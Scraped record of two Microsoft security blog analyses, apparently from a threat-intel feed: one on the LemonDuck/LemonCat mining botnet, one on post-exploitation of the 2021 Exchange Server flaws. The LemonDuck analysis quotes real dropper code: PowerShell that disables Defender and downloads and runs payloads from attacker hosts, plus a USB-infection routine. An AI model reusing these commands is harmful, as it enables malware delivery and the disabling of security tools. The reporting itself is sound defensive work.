objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-03-26T05:28:04", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dopped the xx.bat file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Fig 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI Event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. __PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer __ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17.__ Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which 